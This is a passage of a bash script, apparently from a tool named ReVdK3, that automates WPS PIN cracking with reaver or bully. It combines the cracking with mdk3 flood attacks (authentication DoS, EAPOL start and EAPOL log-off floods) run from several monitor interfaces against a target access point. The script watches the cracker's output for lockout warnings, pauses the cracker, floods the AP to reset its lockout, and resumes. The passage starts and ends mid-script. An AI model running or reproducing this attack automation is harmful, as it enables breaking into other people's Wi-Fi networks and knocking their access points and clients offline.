echo -e "\e[36m\e[40m\e[1mx BULLY COMMAND LINE YOU HAVE CHOOSEN x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
############### -B -F arguments false###############################
if [ -z $BRUTEFORCE_CHECKSUM ]; then
if [ -z "$CHANNEL" -a -n "$DISTANCE_BETWEEN_PINS" ]; then
echo "bully -b $MAC -1 $DISTANCE_BETWEEN_PINS,1 -l 10 -S -v3 -F $MON1";
BULLY_COMMAND_LINE=`echo "bully -b $MAC -1 "$DISTANCE_BETWEEN_PINS,1" -l 10 -S -v3 -F $MON1"`;
echo ;
fi
if [ -z "$DISTANCE_BETWEEN_PINS" -a -n "$CHANNEL" ]; then
echo "bully -b $MAC -c $CHANNEL -l 10 -S -v3 -F $MON1";
BULLY_COMMAND_LINE=`echo "bully -b $MAC -c $CHANNEL -l 10 -S -v3 -F $MON1"`;
echo;
fi
if [ -n "$DISTANCE_BETWEEN_PINS" -a -n "$CHANNEL" ]; then
echo "bully -b $MAC -c $CHANNEL -1 $DISTANCE_BETWEEN_PINS,1 -l 10 -S -v3 -F $MON1";
BULLY_COMMAND_LINE=`echo "bully -b $MAC -c $CHANNEL -1 "$DISTANCE_BETWEEN_PINS,1" -l 10 -S -v3 -F $MON1"`;
echo ;
fi
if [ -z "$CHANNEL" -a -z "$DISTANCE_BETWEEN_PINS" ]; then
echo "bully -b $MAC -l 10 -S -v3 -F $MON1";
BULLY_COMMAND_LINE=`echo "bully -b $MAC -l 10 -S -v3 -F $MON1"`;
echo ;
fi
fi
############### -B -F arguments true###############################
if [[ "$BRUTEFORCE_CHECKSUM" = @(y|Y) ]]; then
if [ -z "$CHANNEL" -a -n "$DISTANCE_BETWEEN_PINS" ]; then
echo "bully -b $MAC -1 $DISTANCE_BETWEEN_PINS,1 -l 10 -S -v3 -B -F $MON1";
BULLY_COMMAND_LINE=`echo "bully -b $MAC -1 "$DISTANCE_BETWEEN_PINS,1" -l 10 -S -v3 -B -F $MON1"`;
echo ;
fi
if [ -z "$DISTANCE_BETWEEN_PINS" -a -n "$CHANNEL" ]; then
echo "bully -b $MAC -c $CHANNEL -l 10 -S -v3 -B -F $MON1";
BULLY_COMMAND_LINE=`echo "bully -b $MAC -c $CHANNEL -l 10 -S -v3 -B -F $MON1"`;
echo;
fi
if [ -n "$DISTANCE_BETWEEN_PINS" -a -n "$CHANNEL" ]; then
echo "bully -b $MAC -c $CHANNEL -1 $DISTANCE_BETWEEN_PINS,1 -l 10 -S -v3 -B -F $MON1";
BULLY_COMMAND_LINE=`echo "bully -b $MAC -c $CHANNEL -1 "$DISTANCE_BETWEEN_PINS,1" -l 10 -S -v3 -B -F $MON1"`;
echo ;
fi
if [ -z "$CHANNEL" -a -z "$DISTANCE_BETWEEN_PINS" ]; then
echo "bully -b $MAC -l 10 -S -v3 -B -F $MON1";
BULLY_COMMAND_LINE=`echo "bully -b $MAC -l 10 -S -v3 -B -F $MON1"`;
echo ;
fi
fi
echo -e "\e[34m\e[7m\e[1mWarning:\e[31m\e[0m\e[31m\e[1m
Your mac address is not spoofed when using bully for proper functionality of
bully.\e[30m\e[0m"
echo ;
read -p "Are you satisified with this configuration? if not, input 'r' and you will be returned to Bully's Configuration Wizard": SATISFIED_OPTION;
if [ -e /etc/bully_tmp.txt ]; then
rm -f /etc/bully_tmp.txt
fi
if [ -e /etc/aireplay_tmp.txt ]; then
rm -f /etc/aireplay_tmp.txt
fi
clear
done
}
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx ReVdK3 preferred WPS Pin Crackers x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx x\e[0m";
echo -e "\e[36m\e[40m\e[1mx[1] Reaver v1.4 (legendary) x\e[0m";
echo -e "\e[36m\e[40m\e[1mx Choose this option if you prefer to crack with reaver v1.4 x\e[0m";
echo -e "\e[36m\e[40m\e[1mx............................................................................x\e[0m";
echo -e "\e[36m\e[40m\e[1mx[2] Bully v1.0-22 x\e[0m";
echo -e "\e[36m\e[40m\e[1mx Choose this option if you prefer to crack with bully v1.0-22 x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p "Choose a preferred WPS Pin Cracker from above": WPS_PIN_CRACKER_OPTION
while [[ $WPS_PIN_CRACKER_OPTION != @(1|2) ]]; do
echo -e "\e[31m\e[1mIncorrect Option, input either '1' for reaver or '2' for bully\e[0m";
echo ;
read -p "Choose a preferred WPS Pin Cracker from above": WPS_PIN_CRACKER_OPTION
echo ;
done
if [ $WPS_PIN_CRACKER_OPTION = 1 ]; then
if [ ! -z "$REAVER_CHECK" ]; then
clear;
REAVER_COMMAND_LINE_OPTIONS
else
echo -e "\e[31m\e[1mreaver is not installed.Exiting script...\e[30m\e[0m";
exit
fi
fi
if [ $WPS_PIN_CRACKER_OPTION = 2 ]; then
if [ ! -z "$BULLY_CHECK" ]; then
clear;
BULLY_COMMAND_LINE_OPTIONS
else
echo -e "\e[31m\e[1mbully is not installed.Exiting script...\e[30m\e[0m";
exit
fi
fi
function MDK3_MAIN_MENU {
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx WELCOME TO MDK3 FLOOD ATTACK MAIN MENU x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx[1] Authentication DoS Flood Attack x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx[2] EAPOL Start Flood Attack x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx[3] EAPOL log off Flood Attack x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx NOTE:This script will stop reaver once it detects the AP is locked and x\e[0m";
echo -e "\e[36m\e[40m\e[1mx then flood the Access Point for the time period you choose after flooding x\e[0m";
echo -e "\e[36m\e[40m\e[1mx reaver resumes.This process goes on until reaver finds the correct pin! x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p "Which Attack You Prefer to carry out(Input No.)?": MDK3_MAIN_MENU_OPTION;
while [[ "$MDK3_MAIN_MENU_OPTION" != @(1|2|3) ]]; do
echo -e "\e[31m\e[1mIncorrect Option choosen, Please choose an option from the Main Menu!\e[0m";
echo ;
read -p "Which Attack You Prefer to carry out(Input No.)?": MDK3_MAIN_MENU_OPTION;
done;
if [ "$MDK3_MAIN_MENU_OPTION" = 1 ]; then
clear
AUTH_DOS_MAIN_MENU;
fi
if [ "$MDK3_MAIN_MENU_OPTION" = 2 ]; then
clear
EAPOL_START_FLOOD_ATTACK_MAIN_MENU;
fi
if [ "$MDK3_MAIN_MENU_OPTION" = 3 ]; then
clear
EAPOL_LOG_OFF_ATTACK_MAIN_MENU;
fi
}
###########################################################################
function AUTH_DOS_MAIN_MENU {
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx Authentication DoS Flood Attack x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mxNOTE:This Attack will start flooding the AP with numerous fake clients x\e[0m";
echo -e "\e[36m\e[40m\e[1mxuntil reaver detects that the AP is unlocked. The attack will restart when x\e[0m";
echo -e "\e[36m\e[40m\e[1mxthe AP has locked itself again...the process goes on! x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mxThe Authentication DoS Flood Command line below will be used x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
AUTH_DOS_FLOOD_COMMAND=`echo -e "\e[36m\e[1mmdk3 $MON1 a -a $MAC -s 200 & mdk3 $MON2 a -a $MAC -s 200 & mdk3 "$MON3" a -a $MAC -s 200\e[0m"`;
echo "$AUTH_DOS_FLOOD_COMMAND";
echo ;
read -p "To start the attack press ENTER to proceed or input 'r' to return to mdk3 main menu": RETURN_OPTION_FOR_AUTH_DOS_FOR_AUTH_DOS
if [ "$RETURN_OPTION_FOR_AUTH_DOS_FOR_AUTH_DOS" = r ]; then
clear
MDK3_MAIN_MENU
fi
echo -e "\e[36m\e[1mStarting MDK3 Auth Flood Attack...\e[0m"
sleep 3;
clear
if [ $WPS_PIN_CRACKER_OPTION = 1 ]; then
REAVER & AIREPLAY & MDK3_FOR_REAVER & TAIL_FOR_REAVER;
fi
if [ $WPS_PIN_CRACKER_OPTION = 2 ]; then
BULLY & AIREPLAY & MDK3_FOR_BULLY & TAIL_FOR_BULLY;
fi
}
###########################################################################
function EAPOL_START_FLOOD_ATTACK_MAIN_MENU {
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx EAPOL Start Flood Attack x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mxNOTE:This Attack will start flooding the AP with numerous EAPOL start x\e[0m";
echo -e "\e[36m\e[40m\e[1mxpackets until reaver detects that the AP is unlocked. The attack will x\e[0m";
echo -e "\e[36m\e[40m\e[1mxrestart when the AP has locked itself again...the process goes on! x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mxThe Authentication EAPOL Start Flood Attack Command line below will be usedx\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
EAPOL_START_FLOOD_COMMAND=`echo -e "\e[36m\e[1mmdk3 $MON1 x 0 -t $MAC -n $ESSID -s 200 & mdk3 $MON2 x 0 -t $MAC -n $ESSID -s 200 & mdk3 $MON3 x 0 -t $MAC -n $ESSID -s 200\e[0m"`;
echo "$EAPOL_START_FLOOD_COMMAND";
read -p "To start the attack press ENTER to proceed or input 'r' to return to mdk3 main menu": RETURN_OPTION_FOR_EAPOL_START_FLOOD;
if [ "$RETURN_OPTION_FOR_EAPOL_START_FLOOD" = r ]; then
clear
MDK3_MAIN_MENU;
fi
echo -e "\e[36m\e[1mStarting MDK3 EAPOL Start Flood Attack...\e[0m";
sleep 3;
if [ $WPS_PIN_CRACKER_OPTION = 1 ]; then
REAVER & AIREPLAY & MDK3_FOR_REAVER & TAIL_FOR_REAVER;
fi
if [ $WPS_PIN_CRACKER_OPTION = 2 ]; then
BULLY & AIREPLAY & MDK3_FOR_BULLY & TAIL_FOR_BULLY;
fi
}
###########################################################################
function EAPOL_LOG_OFF_ATTACK_MAIN_MENU {
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx EAPOL Log Off Flood Attack x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mxNOTE:This Attack will start flooding the AP with numerous EAPOL log off x\e[0m";
echo -e "\e[36m\e[40m\e[1mxpackets until reaver detects that the AP is unlocked. The attack will x\e[0m";
echo -e "\e[36m\e[40m\e[1mxrestart when the AP has locked itself again...the process goes on! x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo;
read -p "What is the MAC address of one of the client's connected?": TARGET_STATION
while [[ "$TARGET_STATION" = @(|) ]]; do
echo -e "\e[31m\e[1mYou cannot leave this field blank\e[0m";
echo
read -p "What is the MAC address of one of the client connected?": TARGET_STATION
done
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mxThe Authentication EAPOL Log Off Flood Attack Command line below will be usedx\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
EAPOL_LOG_OFF_FLOOD_COMMAND=`echo -e "\e[36m\e[1mmdk3 $MON1 x 1 -t $MAC -s 200 -c $TARGET_STATION & mdk3 $MON2 x 1 -t $MAC -s 200 -c $TARGET_STATION & mdk3 $MON3 x 1 -t $MAC -s 200 -c $TARGET_STATION\e[0m"`;
echo "$EAPOL_LOG_OFF_FLOOD_COMMAND";
read -p "To start the attack press ENTER to proceed or input 'r' to return to mdk3 main menu": RETURN_OPTION_FOR_EAPOL_LOG_OFF_FLOOD;
if [ "$RETURN_OPTION_FOR_EAPOL_LOG_OFF_FLOOD" = r ]; then
clear
MDK3_MAIN_MENU;
fi
echo -e "\e[36m\e[1mStarting MDK3 EAPOL Log Off Flood Attack...\e[0m";
sleep 3;
clear;
if [ $WPS_PIN_CRACKER_OPTION = 1 ]; then
REAVER & AIREPLAY & MDK3_FOR_REAVER & TAIL_FOR_REAVER;
fi
if [ $WPS_PIN_CRACKER_OPTION = 2 ]; then
BULLY & AIREPLAY & MDK3_FOR_BULLY & TAIL_FOR_BULLY;
fi
}
##########################################################################
function REAVER {
while :;do
echo y|$REAVER_COMMAND_LINE|tee -a /etc/reaver_tmp.txt > /dev/null
echo "Please Wait..." > /etc/reaver_tmp.txt 2> /dev/null;
sleep 5;
done
}
###########################################################################
function BULLY {
while :; do
stdbuf -o0 -e0 $BULLY_COMMAND_LINE|tee -a /etc/bully_tmp.txt > /dev/null
echo "Please Wait..." > /etc/bully_tmp.txt 2> /dev/null
sleep 5;
done
}
###########################################################################
function MDK3_FOR_REAVER {
while :; do
MDK3_KILLALL_1=`ps -A|grep mdk3`
VARIABLE_CHECK_FOR_RATE_LIMITING=`tail -1 /etc/reaver_tmp.txt 2> /dev/null`;
SUCCESSIVE_EAPOL_FAILURES=`tail -4 /etc/reaver_tmp.txt 2> /dev/null|grep -F '[!] WARNING: 25 successive start failures'`;
while [ "$VARIABLE_CHECK_FOR_RATE_LIMITING" = "[!] WARNING: Detected AP rate limiting, waiting 10 seconds before re-checking" -a -z "$MDK3_KILLALL_1" ]; do
if [ "$MDK3_MAIN_MENU_OPTION" = 1 ]; then
gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -e "mdk3 $MON1 a -a $MAC -s 200" & gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -e "mdk3 $MON2 a -a $MAC -s 200" & gnome-terminal -e --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -e "mdk3 $MON3 a -a $MAC -s 200";
###gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -x bash -c "while :;do mdk3 $MON1 a -a $MAC -s 200;done" & gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -x bash -c "while :;do mdk3 $MON2 a -a $MAC -s 200;done" & gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -x bash -c "while :;do mdk3 $MON3 a -a $MAC -s 200;done";
sleep 0.5;
fi
if [ "$MDK3_MAIN_MENU_OPTION" = 2 ]; then
gnome-terminal --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e "mdk3 $MON1 x 0 -t $MAC -n "$ESSID" -s 200" & gnome-terminal --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e "mdk3 $MON2 x 0 -t $MAC -n "$ESSID" -s 200" & gnome-terminal --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e "mdk3 $MON3 x 0 -t $MAC -n "$ESSID" -s 200";
###gnome-terminal --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -x bash -c "while :;do mdk3 $MON1 x 0 -t $MAC -n "$ESSID" -s 200;done" & gnome-terminal --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -x bash -c "while :;do mdk3 $MON2 x 0 -t $MAC -n "$ESSID" -s 200;done" & gnome-terminal --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -x bash -c "while :;do mdk3 $MON3 x 0 -t $MAC -n "$ESSID" -s 200;done";
sleep 0.5;
fi
if [ "$MDK3_MAIN_MENU_OPTION" = 3 ]; then
###gnome-terminal --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -x bash -c "while :;do mdk3 $MON1 x 1 -t $MAC -s 200 -c $TARGET_STATION;done" & gnome-terminal --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -x bash -c "while :;do mdk3 $MON2 x 1 -t $MAC -s 200 -c $TARGET_STATION;done" & gnome-terminal --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -x bash -c "while :;do mdk3 $MON3 x 1 -t $MAC -s 200 -c $TARGET_STATION;done";
gnome-terminal --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e "mdk3 $MON1 x 1 -t $MAC -s 200 -c $TARGET_STATION" & gnome-terminal --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e "mdk3 $MON2 x 1 -t $MAC -s 200 -c $TARGET_STATION" & gnome-terminal --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e "mdk3 $MON3 x 1 -t $MAC -s 200 -c $TARGET_STATION";
sleep 0.5;
fi
MDK3_KILLALL_1=`ps -A|grep mdk3`
VARIABLE_CHECK_FOR_RATE_LIMITING=`tail -1 /etc/reaver_tmp.txt 2> /dev/null`;
SUCCESSIVE_EAPOL_FAILURES=`tail -4 /etc/reaver_tmp.txt 2> /dev/null|grep -F '[!] WARNING: 25 successive start failures'`;
done
###
while [ "$SUCCESSIVE_EAPOL_FAILURES" = "[!] WARNING: 25 successive start failures" -a -z "$MDK3_KILLALL_1" ]; do
killall -STOP reaver
echo -e "\e[36m\e[1mReaver detected 25 successive eapol failures!, pausing reaver and running flood attacks for 60 second!\e[0m" >> /etc/reaver_tmp.txt ;
if [ "$MDK3_MAIN_MENU_OPTION" = 1 ]; then
gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -e "timeout 60 mdk3 $MON1 a -a $MAC -s 200" & gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -e "timeout 60 mdk3 $MON2 a -a $MAC -s 200" & gnome-terminal -e --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -e "timeout 60 mdk3 $MON3 a -a $MAC -s 200";
##gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -x bash -c "while :; do mdk3 $MON1 a -a $MAC -s 200; done" & gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -x bash -c "while :;do mdk3 $MON2 a -a $MAC -s 200;done" & gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -x bash -c "while :;do mdk3 $MON3 a -a $MAC -s 200;done";
sleep 60;
fi
if [ "$MDK3_MAIN_MENU_OPTION" = 2 ]; then
gnome-terminal --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e "timeout 60 mdk3 $MON1 x 0 -t $MAC -n "$ESSID" -s 200" & gnome-terminal --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e " timeout 60 mdk3 $MON2 x 0 -t $MAC -n "$ESSID" -s 200" & gnome-terminal --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e "timeout 60 mdk3 $MON3 x 0 -t $MAC -n "$ESSID" -s 200";
###gnome-terminal --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -x bash -c "while :;do mdk3 $MON1 x 0 -t $MAC -n "$ESSID" -s 200;done" & gnome-terminal --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -x bash -c "while :;do mdk3 $MON2 x 0 -t $MAC -n "$ESSID" -s 200;done" & gnome-terminal --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -x bash -c "while :;do mdk3 $MON3 x 0 -t $MAC -n "$ESSID" -s 200;done";
sleep 60;
fi
if [ "$MDK3_MAIN_MENU_OPTION" = 3 ]; then
gnome-terminal --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e "timeout 60 mdk3 $MON1 x 1 -t $MAC -s 200 -c $TARGET_STATION" & gnome-terminal --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e "timeout 60 mdk3 $MON2 x 1 -t $MAC -s 200 -c $TARGET_STATION" & gnome-terminal --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e "timeout 60 mdk3 $MON3 x 1 -t $MAC -s 200 -c $TARGET_STATION";
###gnome-terminal --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -x bash -c "while :;do mdk3 $MON1 x 1 -t $MAC -s 200 -c $TARGET_STATION;done" & gnome-terminal --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -x bash -c "while :;do mdk3 $MON2 x 1 -t $MAC -s 200 -c $TARGET_STATION;done" & gnome-terminal --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -x bash -c "while :;do mdk3 $MON3 x 1 -t $MAC -s 200 -c $TARGET_STATION;done";
sleep 60;
fi
killall -CONT reaver;
VARIABLE_CHECK_FOR_RATE_LIMITING=`tail -1 /etc/reaver_tmp.txt 2> /dev/null`
SUCCESSIVE_EAPOL_FAILURES=`tail -4 /etc/reaver_tmp.txt 2> /dev/null|grep -F '[!] WARNING: 25 successive start failures'`;
MDK3_KILLALL_1=`ps -A|grep mdk3`
done
###
VARIABLE_CHECK_FOR_RATE_LIMITING=`tail -1 /etc/reaver_tmp.txt 2> /dev/null`
SUCCESSIVE_EAPOL_FAILURES=`tail -4 /etc/reaver_tmp.txt 2> /dev/null|grep -F '[!] WARNING: 25 successive start failures'`;
if [ "$VARIABLE_CHECK_FOR_RATE_LIMITING" != "[!] WARNING: Detected AP rate limiting, waiting 10 seconds before re-checking" -o "$SUCCESSIVE_EAPOL_FAILURES" = "[!] WARNING: 25 successive start failures" ]; then
KILL_ALL_MDK3_EMULATORS_1=`ps -n 2> /dev/null|cut -d ' ' -f1,2,3,4,5,6,7,8,9,11,12,13,14,15|grep 'bash -c while :;do'|cut -d ' ' -f1|tr -s [:space:] ' '`
###for i in $KILL_ALL_MDK3_EMULATORS_1 ; do
###kill -9 "$i" &> /dev/null ;
###kill -9"$i" &> /dev/null ;
###killall mdk3 2> /dev/null
##done
##KILL_ALL_MDK3_EMULATORS_1=`ps -n 2> /dev/null|cut -d ' ' -f1,2,3,4,5,6,7,8,9,11,12,13,14,15|grep 'bash -c while :;do'|cut -d ' ' -f2|tr -s [:space:] ' '`
##for i in $KILL_ALL_MDK3_EMULATORS_1 ; do
##kill -9 "$i" &> /dev/null ;
##kill -9 "$i" &> /dev/null ;
##done
killall mdk3 2> /dev/null
fi
done
}
###########################################################################
function MDK3_FOR_BULLY {
while :; do
MDK3_KILLALL_1=`ps -A|grep mdk3`
VARIABLE_CHECK_FOR_RATE_LIMITING=`tail -1 /etc/bully_tmp.txt 2> /dev/null`;
while [ "$VARIABLE_CHECK_FOR_RATE_LIMITING" = "[!] WPS lockout reported, sleeping for 10 seconds ..." -a -z "$MDK3_KILLALL_1" ]; do
if [ "$MDK3_MAIN_MENU_OPTION" = 1 ]; then
gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -e "mdk3 $MON1 a -a $MAC -s 200" & gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -e "mdk3 $MON2 a -a $MAC -s 200" & gnome-terminal -e --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -e "mdk3 $MON3 a -a $MAC -s 200";
###gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -x bash -c "while :; do mdk3 $MON1 a -a $MAC -s 200; done" & gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -x bash -c "while :;do mdk3 $MON2 a -a $MAC -s 200;done" & gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -x bash -c "while :;do mdk3 $MON3 a -a $MAC -s 200;done";
sleep 0.5;
fi
if [ "$MDK3_MAIN_MENU_OPTION" = 2 ]; then
gnome-terminal --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e "mdk3 $MON1 x 0 -t $MAC -n "$ESSID" -s 200" & gnome-terminal --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e "mdk3 $MON2 x 0 -t $MAC -n "$ESSID" -s 200" & gnome-terminal --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e "mdk3 $MON3 x 0 -t $MAC -n "$ESSID" -s 200";
###gnome-terminal --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -x bash -c "while :;do mdk3 $MON1 x 0 -t $MAC -n "$ESSID" -s 200;done" & gnome-terminal --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -x bash -c "while :;do mdk3 $MON2 x 0 -t $MAC -n "$ESSID" -s 200;done" & gnome-terminal --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -x bash -c "while :;do mdk3 $MON3 x 0 -t $MAC -n "$ESSID" -s 200;done";
sleep 0.5;
fi
if [ "$MDK3_MAIN_MENU_OPTION" = 3 ]; then
###gnome-terminal --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -x bash -c "while :;do mdk3 $MON1 x 1 -t $MAC -s 200 -c $TARGET_STATION;done" & gnome-terminal --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -x bash -c "while :;do mdk3 $MON2 x 1 -t $MAC -s 200 -c $TARGET_STATION;done" & gnome-terminal --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -x bash -c "while :;do mdk3 $MON3 x 1 -t $MAC -s 200 -c $TARGET_STATION;done";
gnome-terminal --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e "timeout 60 mdk3 $MON1 x 1 -t $MAC -s 200 -c $TARGET_STATION" & gnome-terminal --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e "timeout 60 mdk3 $MON2 x 1 -t $MAC -s 200 -c $TARGET_STATION" & gnome-terminal --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e "timeout 60 mdk3 $MON3 x 1 -t $MAC -s 200 -c $TARGET_STATION";
sleep 0.5;
fi
MDK3_KILLALL_1=`ps -A|grep mdk3`
VARIABLE_CHECK_FOR_RATE_LIMITING=`tail -1 /etc/bully_tmp.txt 2> /dev/null`;
done
###
VARIABLE_CHECK_FOR_RATE_LIMITING=`tail -1 /etc/bully_tmp.txt 2> /dev/null`;
if [ "$VARIABLE_CHECK_FOR_RATE_LIMITING" != "[!] WPS lockout reported, sleeping for 10 seconds ..." ]; then
